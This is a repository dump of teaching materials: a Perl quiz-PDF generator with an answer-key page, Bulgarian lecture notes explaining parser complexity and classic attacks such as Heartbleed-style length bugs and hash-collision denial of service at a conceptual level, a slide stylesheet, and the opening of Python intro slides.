169 | # get 3 random answares
170 | 	my @mis = ();
171 | 	if ($#mistakes <=2)	{
172 | 		for (my $m=0; $m <=2 ; $m++) {
173 | 			$mis[$m] = $mistakes[$m] if defined($mistakes[$m]);
174 | 		}
175 | 	} else {
176 | 	 	my %inuse = ();
177 | 	 	for (my $m = 0; $m < 3; $m++) {
178 |  			my $num = 0 + int(rand($#mistakes));
179 |  			until (! exists $inuse{$num}) {
180 | 	 			$num = 0 + int(rand($#mistakes));
181 |  			}
182 |  			$inuse{$num} = 0;
183 |  			$mis[$m] = $mistakes[$num];
184 |  		}
185 | 	}
186 | 
187 | # save the random chosen wrong answares into the hash
188 | 	$entry_count = 0;
189 | 	for (my $m = 1; $m <= 4; $m++) {
190 | 		# skip the right answare place
191 | 		next if ($m == $ques{$qid}[0]);
192 | 		$ques{$qid}[$m] = $mis[$entry_count] if defined($mis[$entry_count]);
193 | 		$entry_count++;
194 | 	}
195 | 
196 | # save the question into the hash
197 | 	$ques{$qid}[5] = $question;
198 | # save the answare into the hash
199 | 	$ques{$qid}[$ques{$qid}[0]] = $answares[0 + int(rand($#answares))];
200 | # add ? to all questions that don't have one at the end
201 | 	print "Id: $qid Qid: $ques{$qid}[5]\n" if $debug;
202 | 	$ques{$qid}[5] =~ s/:\s*$// if ($ques{$qid}[5] =~ /:\s*$/);
203 | 	$ques{$qid}[5] = $ques{$qid}[5].' ?' if ($ques{$qid}[5] !~ /\?$/);
204 | 
205 | 	page_check(\$last_line,\$page_count);
206 | 
207 | 	my $q_len = length($ques{$qid}[5]);
208 | 	if ($q_len > 92) {
209 | 		my @lines = split /\n/, $ques{$qid}[5];
210 | 		for (my $l=0;$l<=$#lines;$l++) {
211 | 			$lines[$l] =~ s/\n/ /g;
212 | 			if ($l==0) {
213 | 				prText(35,$last_line,sprintf('%d. %s', $qid, $lines[$l]));
214 | 			} else {
215 | 				prText(35,$last_line,$lines[$l]) if ($lines[$l] !~ /^[\s|\n]*$/);
216 | 			}
217 | 			page_check(\$last_line,\$page_count);
218 | 		}
219 | 	} else {
220 | 		prText(35,$last_line,sprintf('%d. %s', $qid, $ques{$qid}[5]));
221 | 	}
222 | 
223 | 	my %a_names = ( 1 => 'a', 2 => 'b', 3 => 'c', 4 => 'd' );
224 | 	$entry_count = 1;
225 | 	for (my $c=1;$c<5;$c++) {
226 | 		if (defined($ques{$qid}[$c]) && $ques{$qid}[$c] ne '-1') {
227 |  			printf("  %s) %s\n", $a_names{$entry_count}, $ques{$qid}[$c]) if $debug;
228 | 			page_check(\$last_line,\$page_count);
229 | 			prText(35,$last_line,sprintf("  %s) %s", $a_names{$entry_count}, $ques{$qid}[$c]));
230 | 			$entry_count++;
231 | 		}
232 | 	}
233 | 	$tcount++;
234 | }
235 | 
236 | prEnd();
237 | prFile("$filename-asnwares.pdf");
238 | prTTFont('/usr/share/fonts/arial.ttf');
239 | prText(510,760,"Вариянт: $variant");
240 | for my $l (1..25) {
241 | 	my $pos = ($l * 18) + 24;
242 | 	prText($pos,724,$l);
243 | 	prText($pos,684,$l+25);
244 | }
245 | 
246 | # print the right answares :)
247 | $tcount = 1;
248 | print "\nNum: \n" if $debug;
249 | # prAdd("0.0 0.0 0.0 RG\n");
250 | #for (sort keys(%ques)) {
251 | for (1..$max_questions) {
252 | 	print "$_ not defined\n" if (!defined($ques{$_}[0]) && $debug);
253 | 	my $right = 'a';
254 | 	$right = 'b' if ($ques{$_}[0] == 2);
255 | 	$right = 'c' if ($ques{$_}[0] == 3);
256 | 	$right = 'd' if ($ques{$_}[0] == 4);
257 |  	printf("%2d: %s \n",$tcount, $right) if $debug;
258 |  	prAdd("q 40 717 m 490 717 l S Q");
259 |  	prAdd("q 40 698 m 490 698 l S Q");
260 |  	prAdd("q 40 677 m 490 677 l S Q");
261 |  	prAdd("q 40 658 m 490 658 l S Q");
262 |  	prAdd("q 490 698 m 490 717 l S Q");
263 |  	prAdd("q 490 658 m 490 677 l S Q");
264 |  	if ($tcount <= 25) {
265 | 		my $pos = ($tcount * 18) + 24;
266 | 		my $pos2 =  $pos - 2;
267 | 		prAdd("q $pos2 698 m $pos2 717 l S Q");
268 | # 		prAdd("9.0 9.0 9.0 rg\n");
269 | #  		prAdd("$pos2 700 18 20 re\n");
270 | #  		prAdd("t\n");
271 | 		prText($pos,702,$right);
272 | 	} else {
273 | 		my $pos = (($tcount - 25) * 18) + 24;
274 | 		my $pos2 = $pos - 2;
275 | 		prAdd("q $pos2 658 m $pos2 677 l S Q");
276 | 		prText($pos,662,$right);
277 | 	}
278 | 
279 | 	$tcount++;
280 | }
281 | 
282 | for my $l (1..25) {
283 |  	my $pos = ($l * 18) + 20;
284 |  	prAdd("$pos 700 18 20 re\n");
285 |  	prAdd("$pos 660 18 20 re\n");
286 |  }
287 |  prAdd("B\n");
288 | prEnd();
289 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/00complexity.pandoc:
--------------------------------------------------------------------------------
  1 | % Сложност и изчислимост
  2 | % и практическото им приложение в протоколите/форматите/езиците
  3 | % Vasil Kolev \<vasil@ludost.net\>
  4 | 
  5 | # Сложност
  6 | 
  7 | ## Механизми за обработка
  8 | ### Описание
  9 | 
 10 | * Краен автомат
 11 | * Стеков автомат
 12 | * Turing-complete
 13 | 
 14 | <!--
 15 | За обработка на различни типове протоколи/формати имаме в общи линии три абстракции, които можем дам ползваме - краен автомат, стеков автомат и машина на Тюринг.
 16 | -->
 17 | ### Краен автомат
 18 | 
 19 | * (сравнително) лесен за конструкция
 20 | * възможен за валидация
 21 | * ограничен като възможности
 22 | 
 23 | <!--
 24 | Крайните автомати са най-простата възможна конструкция, която в някакви размери е възможна за валидация, но е ограничена като възможности. Един пример за крайни автомати са нормалните регулярни изрази (не тези в perl, където има допълнителни добавки).
 25 | 
 26 | В общи линии протокол, който използва специфичен разделител между различните си полета може да се обработва с краен автомат. 
 27 | -->
 28 | 
 29 | ### Примерен протокол за краен автомат - CSV
 30 | 
 31 | * Може да се обработва с регулярни изрази
 32 | * Coma-separated values
 33 |     * Полетата се разделят със запетайка
 34 |     * Полетата са оградени с двойни кавички
 35 |     * Ако в средата на поле има двойна кавичка, пред нея се поставя \\
 36 | * Пример
 37 | 
 38 | ~~~~~~
 39 | 1,"pesho","gosho, tosho",tmp\"m,"tmp\"tmp",,
 40 | ~~~~~~
 41 | 
 42 | <!--
 43 | Един примерен протокол е CSV - coma-separated values. Представлява стойности, оградени в кавички и разделени с запетаи, като има правила как се решава проблема ако в дадено поле има запетая или кавичка. Това може да се обработва и валидира с прост краен автомат или с регулярни изрази.
 44 | -->
 45 | 
 46 | 
 47 | ### Стеков автомат
 48 | 
 49 | * по-сложен за конструкция
 50 | * с повече възможности
 51 | * вложени структури (json, XML)
 52 | * type-length-value схеми
 53 |     * повечето мрежови протоколи го използват
 54 | 
 55 | <!--
 56 | Стековите автомати са по-сложни и се използват за протоколи, в които може да има влагане на различни елементи. Много познати протоколи (като XML, JSON) се обработват със стекови автомати, както и схемите от типа type-length-value, които са повечето мрежови протоколи.
 57 | 
 58 | Тези автомати са по-сложни за писане и съответно по-сложни за валидация, което води до доста грешки в тях. Може да се каже, че този тип автомати, заедно с memory management проблемите в C/C++ са един от най-големите източници на пробиви в сигурността на софтуера.
 59 | 
 60 | Пример за тривиална атака върху такъв недомислен автомат е да направите пакет, в който имате тип, дължина, която е по-голяма от самия пакет и някакви данни, което при неправилно направен автомат/parser ще доведе до четене на данни извън пакета и странно поведение на програмата.
 61 | -->
 62 | 
 63 | ### Примерен протокол (и проблем) за стеков автомат
 64 | 
 65 | * PING протокол с дължина и данни
 66 | * Пращате му пакет, той ви връща същия
 67 | * Какво ще получите, ако му дадете различна дължина?
 68 |     * същия невалиден пакет
 69 |     * crash на програмата
 70 |     * някакви данни след буфера
 71 |     * да не отговори или да отговори с грешка
 72 | * http://heartbleed.com/
 73 | 
 74 | 
 75 | <!--
 76 | Пример за такъв протокол може да се даде с нещо от тип ping - пращате пакет, в който има дължина и данни, и отсрещната страна ви връща същото.
 77 | 
 78 | Какво ще се получи обаче, ако дадете по-голяма дължина, отколкото данни? Има различни варианти:
 79 | Може да получите същия невалиден пакет (каквото повикало, такова се обадило);
 80 | Може да гръмне програмата отсреща, понеже се опитва да чете извън тези данни;
 81 | Да върне някакви данни след буфера, в който е получения пакет и да изтече информация;
 82 | Да не отговори или да върне грешка.
 83 | 
 84 | Само последният вариант е правилен, всичко останало е лошо, като най-лошото е третото. За подобна уязвимост може да видите heartbleed.
 85 | -->
 86 | 
 87 | ### Packet-in-packet
 88 | 
 89 | * Друга атака в/у стекови автомати
 90 | * Оригинален пакет: Preamble|length|data|end
 91 | * Подъл пакет: Preamble|length|(data|preamble|length|baddata|end)|end
 92 |     * ... по wireless мрежа
 93 | 
 94 | <!--
 95 | Това е една атака, описана от Travis Goodspeed преди няколко години. Идеята е, че ако имаме стандартен мрежов протокол и по някаква причина изтървем началото на пакета, има шанс да прочетем нещо, което не трябва в данните му, т.е. да намерим валиден пакет в данните на някой друг. Това важи най-вече за безжични мрежи, където поради зашумяване на ефира може да се изгуби началото на пакета и да се хванат данните като друг пакет.
 96 | 
 97 | Практическото приложение на атаката е, че ако накарате някой на другия край на света да свали от вас голям файл и в него има такива под-пакети, има шанс някой около него да види тези под-пакети като истински, например beacon-и за определена wireless мрежа (да подлъжете някой, че има друга мрежа там), или да се възползвате от някоя уязвимост в wireless драйвера (каквито се намират).
 98 | 
 99 | -->
100 | 
101 | ### Turing complete автомат
102 | 
103 | * това, което ни е познато като "компютърна програма"
104 | * практически невъзможен за валидация
105 |     * супер-експоненциално, 2^p^, p=2^x^
106 | * всички програмни езици (които трябва да са такива)
107 | * разни неща, които не трябва
108 |     * HTML5+CSS3
109 | 
110 | * Примери:
111 | http://beza1e1.tuxen.de/articles/accidentally_turing_complete.html
112 | 
113 | <!--
114 | Машините на Тюринг, въпреки че са нещо наистина мощно и удобно и са основата на информатиката, която познавам, представляват и един сериозен проблем от гледна точка на сигурността.
115 | 
116 | Според някои основни теореми, много е трудно да се докаже някакво специфично поведение на машина на Тюринг, използвайки друга машина на Тюринг, т.е. проверката на верността на всяка такава машина трябва да се прави на ръка. Съществуващите методи за това (ако изобщо се ползват) са супер-експоненциални.
117 | 
118 | Няма да давам пример, понеже ще е сложен (и ще прилича на код от реалния свят). Може да помислите по въпроса какво има в една web страница и колко сложно е реално.
119 | 
120 | -->
121 | 
122 | ### А какво ползваме ние?
123 | 
124 | * Реално погледнато - машини на Тюринг
125 | * Всеки автомат, който има странични ефекти (заделяне на памет например) е такъв
126 | * Още по-сложно да се валидира един такъв parser
127 | 
128 | 
129 | <!--
130 | Въпреки, че имаме по-прости конструкции, това, което най-често се среща в кода е машина на Тюринг, най-вече защото за програмистите е по-лесно. Дори където имаме краен или стеков автомат, много често в кода имаме т.нар. "странични ефекти", които водят до превръщането на автомата в машина на Тюринг и до всякакви неприятни последици.
131 | 
132 | Накратко, мъка.
133 | -->
134 | ## Последици за нас
135 | 
136 | ### Последици 1/2
137 | 
138 | * Невъзможност за сигурна обработка на някои
139 |     * Turing-complete нещата
140 | * Огромно количество security проблеми
141 | * Тотално неразбиране на идеята за валидация
142 | * Shotgun-type валидациа
143 | 
144 | <!--
145 | Това води до много несигурни и опасни parser-и. Някои от тях няма начин на практика да се валидират, някои (които обработват Turing-complete неща) реално нямат как да валидират това, което проверяват, и това ни води до настина много проблеми.
146 | 
147 | Това идва от неразбирането на идеята за валидация, защото хората предпочитат да мислят, че входните им данни винаги са валидни, и просто добавят по някоя друга проверка за случаи, които им хрумват. Това води до т.нар. shotgun-type валидация, т.е. какво би се случило, ако си разпечатате кода на листи, лепнете го на стената и стрелята от далече по него с пушка със съчми, и където падне някоя съчма - слагате проверка...
148 | -->
149 | 
150 | ### Последици 2/2 (weird machines)
151 | 
152 | * Много неща се оказват по странен начин Turing-complete
153 | * Вероятно може да напишете нещо с HTML5+CSS3, което смята bitcoin
154 |     * ... или да ползвате принтер с postscript
155 | 
156 | ### Решения
157 | 
158 | * По-прости протоколи
159 | * Автоматично генерирани parser-и/валидатори
160 | * http://en.wikipedia.org/wiki/Category:Parser_generators
161 | * http://en.wikipedia.org/wiki/Comparison_of_parser_generators
162 | 
163 | <!--
164 | Проблемът почти има решение.
165 | 
166 | Първо, може да се мислят/правят протоколи с по-ниска сложност, доколкото е възможно, т.е. които и лесно могат да се parse-нат, с по-малко неясноти в тях и като цяло колкото се може по-малки, понеже колкото по-малко код се налага да пишете, толкова по-малко грешки могат да се допуснат.
167 | 
168 | Друго нещо, което може (и трябва) да се прави е да се ползват автоматични инструменти за генерирането на parser-и и валидатори. Има едно количество такива, които от зададена формално граматика в някакъв вид могат да генерират код, който да я parse-ва и валидира. Доста от тях са формално доказани (или наистина много добре тествани) и могат да се ползва спокойно. 
169 | 
170 | Примерни инструменти може да потърсите, wikipedia има цяла категория на parser generators.
171 | -->
172 | 
173 | ## Недомислена изчислителна сложност
174 | 
175 | ### Хешове
176 | 
177 | * Каква е сложността за добавяне на елемент в хеш?
178 |      * o(n) = log~b~(n) (b - брой bucket-и)
179 |      * обаче, O(n) = n
180 | 
181 | * Практическо следствие - n.runs-SA-2011.004
182 | http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html
183 | 
184 | <!--
185 | И една отделна атака в/у изчислителната сложност - разликата между средната сложност за изпълняване на операция и максималната.
186 | 
187 | Предполагам, всички знаете какво е хеш, та съвсем накратко - структура, която представлява един твърд масив с пряка адресация от т.нар. bucket-и, към който е закачен свързан списък (или по-рядко - дърво) с елементи. За всеки елемент, който се слага вътре се смята хеш функция, която връща в кой bucket да се добави елемента, а търсенето е в общи линии претърсване на списъка в нужния bucket.
188 | 
189 | По принцип операциите с хеш се водят с логаритмична сложност - намиране, добавяне, махане на елемент. На практика обаче в най-лошия случай сложността е линейна, понеже ако hash функцията ни е калпава, може всички елементи да ни паднат в същия bucket, което да ни сведе хеша до един свързан списък.
190 | -->
191 | 
192 | ### Атаката в/у хешовете
193 | 
194 | * Много елементи, които се хешират до същото нещо
195 | * http://a.com/a.php?aa=&bb=&cc=....
196 | * hash(aa)=hash(bb)=hash(cc)=...
197 | * Това води до ~= n^2^ действия
198 | * При n>10000 това отнема бая време
199 | 
200 | 
201 | <!--
202 | Преди няколко години двама немци откриха, че ако наслагаме много елементи в същия bucket, то изведнъж всичките операции ще ни станат бавни. Оказа се, че почти всички езици, които имат hash таблици в тях (perl, php, java, ruby и т.н.) ползват подобни функции, за които не е трудно да се пресметнат достатъчно съвпадащи стойности.
203 | 
204 | Също така, понеже това е проблем в самия език, нямаше начин това да се оправи от самите програмисти - примерът е как някой подава параметри на web приложение, и самия runtime ги слага в hash, още преди да се изпълни кода на програмиста. В този случай просто сървъра ще цикли известно време, докато или не се прекъсне връзката, или не приключи със самата операция.
205 | 
206 | Това е може би един от най-добрите примери как трябва да се внимава какви примитиви използваме и какъв проблем могат да ни създадат.
207 | -->
208 | 


--------------------------------------------------------------------------------
/presentations/python/Python_files/styles.css:
--------------------------------------------------------------------------------
  1 | @media screen {
  2 |   /* Framework */
  3 |   html {
  4 |     height: 100%;
  5 |   }
  6 | 
  7 |   body {
  8 |     margin: 0;
  9 |     padding: 0;
 10 | 
 11 |     display: block !important;
 12 | 
 13 |     height: 100%;
 14 |     min-height: 740px;
 15 | 
 16 |     overflow-x: hidden;
 17 |     overflow-y: auto;
 18 | 
 19 |     background: rgb(215, 215, 215);
 20 |     background: -o-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190));
 21 |     background: -moz-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190));
 22 |     background: -webkit-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190));
 23 |     background: -webkit-gradient(radial, 50% 50%, 0, 50% 50%, 500, from(rgb(240, 240, 240)), to(rgb(190, 190, 190)));
 24 | 
 25 |     -webkit-font-smoothing: antialiased;
 26 |   }
 27 | 
 28 |   .slides {
 29 |     width: 100%;
 30 |     height: 100%;
 31 |     left: 0;
 32 |     top: 0;
 33 | 
 34 |     position: absolute;
 35 | 
 36 |     -webkit-transform: translate3d(0, 0, 0);
 37 |   }
 38 | 
 39 |   .slides > article {
 40 |     display: block;
 41 | 
 42 |     position: absolute;
 43 |     overflow: hidden;
 44 | 
 45 |     width: 900px;
 46 |     height: 700px;
 47 | 
 48 |     left: 50%;
 49 |     top: 50%;
 50 | 
 51 |     margin-left: -450px;
 52 |     margin-top: -350px;
 53 | 
 54 |     padding: 40px 60px;
 55 | 
 56 |     box-sizing: border-box;
 57 |     -o-box-sizing: border-box;
 58 |     -moz-box-sizing: border-box;
 59 |     -webkit-box-sizing: border-box;
 60 | 
 61 |     border-radius: 10px;
 62 |     -o-border-radius: 10px;
 63 |     -moz-border-radius: 10px;
 64 |     -webkit-border-radius: 10px;
 65 | 
 66 |     background-color: white;
 67 | 
 68 |     border: 1px solid rgba(0, 0, 0, .3);
 69 | 
 70 |     transition: transform .3s ease-out;
 71 |     -o-transition: -o-transform .3s ease-out;
 72 |     -moz-transition: -moz-transform .3s ease-out;
 73 |     -webkit-transition: -webkit-transform .3s ease-out;
 74 |   }
 75 |   .slides.layout-widescreen > article {
 76 |     margin-left: -550px;
 77 |     width: 1100px;
 78 |   }
 79 |   .slides.layout-faux-widescreen > article {
 80 |     margin-left: -550px;
 81 |     width: 1100px;
 82 | 
 83 |     padding: 40px 160px;
 84 |   }
 85 | 
 86 |   .slides.layout-widescreen > article:not(.nobackground):not(.biglogo),
 87 |   .slides.layout-faux-widescreen > article:not(.nobackground):not(.biglogo) {
 88 |     background-position-x: 0, 840px;
 89 |   }
 90 | 
 91 |   /* Clickable/tappable areas */
 92 | 
 93 |   .slide-area {
 94 |     z-index: 1000;
 95 | 
 96 |     position: absolute;
 97 |     left: 0;
 98 |     top: 0;
 99 |     width: 150px;
100 |     height: 700px;
101 | 
102 |     left: 50%;
103 |     top: 50%;
104 | 
105 |     cursor: pointer;
106 |     margin-top: -350px;
107 | 
108 |     tap-highlight-color: transparent;
109 |     -o-tap-highlight-color: transparent;
110 |     -moz-tap-highlight-color: transparent;
111 |     -webkit-tap-highlight-color: transparent;
112 |   }
113 |   #prev-slide-area {
114 |     margin-left: -550px;
115 |   }
116 |   #next-slide-area {
117 |     margin-left: 400px;
118 |   }
119 |   .slides.layout-widescreen #prev-slide-area,
120 |   .slides.layout-faux-widescreen #prev-slide-area {
121 |     margin-left: -650px;
122 |   }
123 |   .slides.layout-widescreen #next-slide-area,
124 |   .slides.layout-faux-widescreen #next-slide-area {
125 |     margin-left: 500px;
126 |   }
127 | 
128 |   /* Slides */
129 | 
130 |   .slides > article {
131 |     display: none;
132 |   }
133 |   .slides > article.far-past {
134 |     display: block;
135 |     transform: translate(-2040px);
136 |     -o-transform: translate(-2040px);
137 |     -moz-transform: translate(-2040px);
138 |     -webkit-transform: translate3d(-2040px, 0, 0);
139 |   }
140 |   .slides > article.past {
141 |     display: block;
142 |     transform: translate(-1020px);
143 |     -o-transform: translate(-1020px);
144 |     -moz-transform: translate(-1020px);
145 |     -webkit-transform: translate3d(-1020px, 0, 0);
146 |   }
147 |   .slides > article.current {
148 |     display: block;
149 |     transform: translate(0);
150 |     -o-transform: translate(0);
151 |     -moz-transform: translate(0);
152 |     -webkit-transform: translate3d(0, 0, 0);
153 |   }
154 |   .slides > article.next {
155 |     display: block;
156 |     transform: translate(1020px);
157 |     -o-transform: translate(1020px);
158 |     -moz-transform: translate(1020px);
159 |     -webkit-transform: translate3d(1020px, 0, 0);
160 |   }
161 |   .slides > article.far-next {
162 |     display: block;
163 |     transform: translate(2040px);
164 |     -o-transform: translate(2040px);
165 |     -moz-transform: translate(2040px);
166 |     -webkit-transform: translate3d(2040px, 0, 0);
167 |   }
168 | 
169 |   .slides.layout-widescreen > article.far-past,
170 |   .slides.layout-faux-widescreen > article.far-past {
171 |     display: block;
172 |     transform: translate(-2260px);
173 |     -o-transform: translate(-2260px);
174 |     -moz-transform: translate(-2260px);
175 |     -webkit-transform: translate3d(-2260px, 0, 0);
176 |   }
177 |   .slides.layout-widescreen > article.past,
178 |   .slides.layout-faux-widescreen > article.past {
179 |     display: block;
180 |     transform: translate(-1130px);
181 |     -o-transform: translate(-1130px);
182 |     -moz-transform: translate(-1130px);
183 |     -webkit-transform: translate3d(-1130px, 0, 0);
184 |   }
185 |   .slides.layout-widescreen > article.current,
186 |   .slides.layout-faux-widescreen > article.current {
187 |     display: block;
188 |     transform: translate(0);
189 |     -o-transform: translate(0);
190 |     -moz-transform: translate(0);
191 |     -webkit-transform: translate3d(0, 0, 0);
192 |   }
193 |   .slides.layout-widescreen > article.next,
194 |   .slides.layout-faux-widescreen > article.next {
195 |     display: block;
196 |     transform: translate(1130px);
197 |     -o-transform: translate(1130px);
198 |     -moz-transform: translate(1130px);
199 |     -webkit-transform: translate3d(1130px, 0, 0);
200 |   }
201 |   .slides.layout-widescreen > article.far-next,
202 |   .slides.layout-faux-widescreen > article.far-next {
203 |     display: block;
204 |     transform: translate(2260px);
205 |     -o-transform: translate(2260px);
206 |     -moz-transform: translate(2260px);
207 |     -webkit-transform: translate3d(2260px, 0, 0);
208 |   }
209 | }
210 | 
211 | @media print {
212 |   /* Set page layout */
213 |   @page {
214 |     size: A4 landscape;
215 |   }
216 | 
217 |   body {
218 |     display: block !important;
219 |   }
220 | 
221 |   .slides > article {
222 |     display: block;
223 | 
224 |     position: relative;
225 | 
226 |     page-break-inside: never;
227 |     page-break-after: always;
228 | 
229 |     overflow: hidden;
230 |   }
231 | 
232 |   h2 {
233 |     position: static !important;
234 |     margin-top: 400px !important;
235 |     margin-bottom: 100px !important;
236 |   }
237 | 
238 |   div.code {
239 |     background: rgb(240, 240, 240);
240 |   }
241 | 
242 |   /* Add explicit links */
243 |   a:link:after, a:visited:after {
244 |    content: " (" attr(href) ") ";
245 |    font-size: 50%;
246 |   }
247 | 
248 |   #help {
249 |     display: none;
250 |     visibility: hidden;
251 |   }
252 | }
253 | 
254 | /* Styles for slides */
255 | 
256 | .slides > article {
257 |   font-family: 'Open Sans', Arial, sans-serif;
258 | 
259 |   color: black;
260 |   text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
261 | 
262 |   font-size: 26px;
263 |   line-height: 36px;
264 | 
265 |   letter-spacing: -1px;
266 | }
267 | 
268 | b {
269 |   font-weight: 600;
270 | }
271 | 
272 | a {
273 |   color: rgb(0, 102, 204);
274 |   text-decoration: none;
275 | }
276 | a:visited {
277 |   color: rgba(0, 102, 204, .75);
278 | }
279 | a:hover {
280 |   color: black;
281 | }
282 | 
283 | p {
284 |   margin: 0;
285 |   padding: 0;
286 | 
287 |   margin-top: 20px;
288 | }
289 | p:first-child {
290 |   margin-top: 0;
291 | }
292 | 
293 | h1 {
294 |   font-size: 60px;
295 |   line-height: 60px;
296 | 
297 |   padding: 0;
298 |   margin: 0;
299 |   margin-top: 200px;
300 |   margin-bottom: 5px;
301 |   padding-right: 40px;
302 | 
303 |   font-weight: 600;
304 | 
305 |   letter-spacing: -3px;
306 | 
307 |   color: rgb(51, 51, 51);
308 | }
309 | 
310 | h2 {
311 |   font-size: 45px;
312 |   line-height: 45px;
313 | 
314 |   position: absolute;
315 |   bottom: 150px;
316 | 
317 |   padding: 0;
318 |   margin: 0;
319 |   padding-right: 40px;
320 | 
321 |   font-weight: 600;
322 | 
323 |   letter-spacing: -2px;
324 | 
325 |   color: rgb(51, 51, 51);
326 | }
327 | 
328 | h3 {
329 |   font-size: 30px;
330 |   line-height: 36px;
331 | 
332 |   padding: 0;
333 |   margin: 0;
334 |   padding-right: 40px;
335 | 
336 |   font-weight: 600;
337 | 
338 |   letter-spacing: -1px;
339 | 
340 |   color: rgb(51, 51, 51);
341 | }
342 | 
343 | ul {
344 |   margin: 0;
345 |   padding: 0;
346 |   margin-top: 20px;
347 |   margin-left: 1.5em;
348 | }
349 | li {
350 |   padding: 0;
351 |   margin: 0 0 .5em 0;
352 | }
353 | 
354 | div.code {
355 |   padding: 5px 10px;
356 |   margin-top: 20px;
357 |   margin-bottom: 20px;
358 |   overflow: hidden;
359 | 
360 |   background: rgb(240, 240, 240);
361 |   border: 1px solid rgb(224, 224, 224);
362 | }
363 | pre {
364 |   margin: 0;
365 |   padding: 0;
366 | 
367 |   font-family: 'Droid Sans Mono', 'Courier New', monospace;
368 |   font-size: 18px;
369 |   line-height: 24px;
370 |   letter-spacing: -1px;
371 | 
372 |   color: black;
373 | }
374 | 
375 | code {
376 |   font-size: 95%;
377 |   font-family: 'Droid Sans Mono', 'Courier New', monospace;
378 | 
379 |   color: black;
380 | }
381 | 
382 | article > .image {
383 |   text-align: center;
384 |   margin-top: 40px;
385 | }
386 | 
387 | table {
388 |   width: 100%;
389 |   border-collapse: collapse;
390 |   margin-top: 40px;
391 | }
392 | th {
393 |   font-weight: 600;
394 |   text-align: left;
395 | }
396 | td,
397 | th {
398 |   border: 1px solid rgb(224, 224, 224);
399 |   padding: 5px 10px;
400 |   vertical-align: top;
401 | }
402 | 
403 | p.link {
404 |   margin-left: 20px;
405 | }
406 | 
407 | /* Code */
408 | div.code {
409 |   outline: 0px solid transparent;
410 | }
411 | div.playground {
412 |   position: relative;
413 | }
414 | div.output {
415 |   position: absolute;
416 |   left: 50%;
417 |   top: 50%;
418 |   right: 40px;
419 |   bottom: 40px;
420 |   background: #202020;
421 |   padding: 5px 10px;
422 |   z-index: 2;
423 | 
424 |   border-radius: 10px;
425 |   -o-border-radius: 10px;
426 |   -moz-border-radius: 10px;
427 |   -webkit-border-radius: 10px;
428 | 
429 | }
430 | div.output pre {
431 |   margin: 0;
432 |   padding: 0;
433 |   background: none;
434 |   border: none;
435 |   width: 100%;
436 |   height: 100%;
437 |   overflow: auto;
438 | }
439 | div.output .stdout, div.output pre {
440 |   color: #e6e6e6;
441 | }
442 | div.output .stderr, div.output .error {
443 |   color: rgb(255, 200, 200);
444 | }
445 | div.output .system, div.output .exit {
446 |   color: rgb(255, 230, 120)
447 | }
448 | .buttons {
449 |   position: relative;
450 |   float: right;
451 |   top: -60px;
452 |   right: 10px;
453 | }
454 | div.output .buttons {
455 |   position: absolute;
456 |   float: none;
457 |   top: auto;
458 |   right: 5px;
459 |   bottom: 5px;
460 | }
461 | 
462 | /* Presenter details */
463 | .presenter {
464 |   margin-top: 20px;
465 | }
466 | .presenter p,
467 | .presenter .link {
468 |   margin: 0;
469 |   font-size: 28px;
470 |   line-height: 1.2em;
471 | }
472 | 
473 | /* Output resize details */
474 | .ui-resizable-handle {
475 |   position: absolute;
476 | }
477 | .ui-resizable-n {
478 |   cursor: n-resize;
479 |   height: 7px;
480 |   width: 100%;
481 |   top: -5px;
482 |   left: 0;
483 | }
484 | .ui-resizable-w {
485 |   cursor: w-resize;
486 |   width: 7px;
487 |   left: -5px;
488 |   top: 0;
489 |   height: 100%;
490 | }
491 | .ui-resizable-nw {
492 |   cursor: nw-resize;
493 |   width: 9px;
494 |   height: 9px;
495 |   left: -5px;
496 |   top: -5px;
497 | }
498 | iframe {
499 |   border: none;
500 | }
501 | figcaption {
502 |   color: #666;
503 |   text-align: center;
504 |   font-size: 0.75em;
505 | }
506 | 
507 | #help {
508 |   font-family: 'Open Sans', Arial, sans-serif;
509 |   text-align: center;
510 |   color: white;
511 |   background: #000;
512 |   opacity: 0.5;
513 |   position: fixed;
514 |   bottom: 25px;
515 |   left: 50px;
516 |   right: 50px;
517 |   padding: 20px;
518 | 
519 |   border-radius: 10px;
520 |   -o-border-radius: 10px;
521 |   -moz-border-radius: 10px;
522 |   -webkit-border-radius: 10px;
523 | }
524 | 


--------------------------------------------------------------------------------
/presentations/python/Python.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html><head>
  3 | <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  4 |     <title>Python</title>
  5 |     <meta charset="utf-8">
  6 |     <script src="Python_files/slides.js"></script>
  7 |   <meta content="width=1100,height=750" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"></head>
  8 | 
  9 |   <body class="loaded" style="display: none">
 10 | 
 11 |     <section class="slides layout-widescreen">
 12 |       
 13 |       <article>
 14 |         <h1>Python</h1>
 15 |         <h3>17.03.2015</h3>
 16 |         
 17 |         
 18 |           <div class="presenter">
 19 |             
 20 |   
 21 |   <p>
 22 |     Кирил Владимиров
 23 |   </p>
 24 |   
 25 | 
 26 |           </div>
 27 |         
 28 |           <div class="presenter">
 29 |             
 30 |           </div>
 31 |         
 32 |           <div class="presenter">
 33 |             
 34 |   
 35 |   <p>
 36 |     
 37 |   </p>
 38 |   
 39 | 
 40 |           </div>
 41 |         
 42 |       </article>
 43 |       
 44 |   
 45 |   
 46 |       <article>
 47 |       
 48 |         <h3>Python 101</h3>
 49 |         
 50 |   <ul>
 51 |   
 52 |     <li>general-purpose</li>
 53 |   
 54 |     <li>high-level</li>
 55 |   
 56 |     <li>object-oriented</li>
 57 |   
 58 |     <li>a bit functional</li>
 59 |   
 60 |     <li>...</li>
 61 |   
 62 |   </ul>
 63 | 
 64 |       
 65 |       </article>
 66 |   
 67 |   
 68 |   
 69 |       <article>
 70 |       
 71 |         <h3>Къде отива кодът?</h3>
 72 |         
 73 |   <ul>
 74 |   
 75 |     <li>Код се пише в <code>.py</code> файлове (например gameoflife.py).</li>
 76 |   
 77 |     <li>Изпълнява се с <code>python gameoflife.py</code></li>
 78 |   
 79 |     <li>Можем да пишем код интерактивно, като пуснем python без аргументи.</li>
 80 |   
 81 |   </ul>
 82 | 
 83 |       
 84 |       </article>
 85 |   
 86 |   
 87 |   
 88 |       <article>
 89 |       
 90 |         <h3>Python е предсказуем</h3>
 91 |         
 92 |   
 93 |   <p>
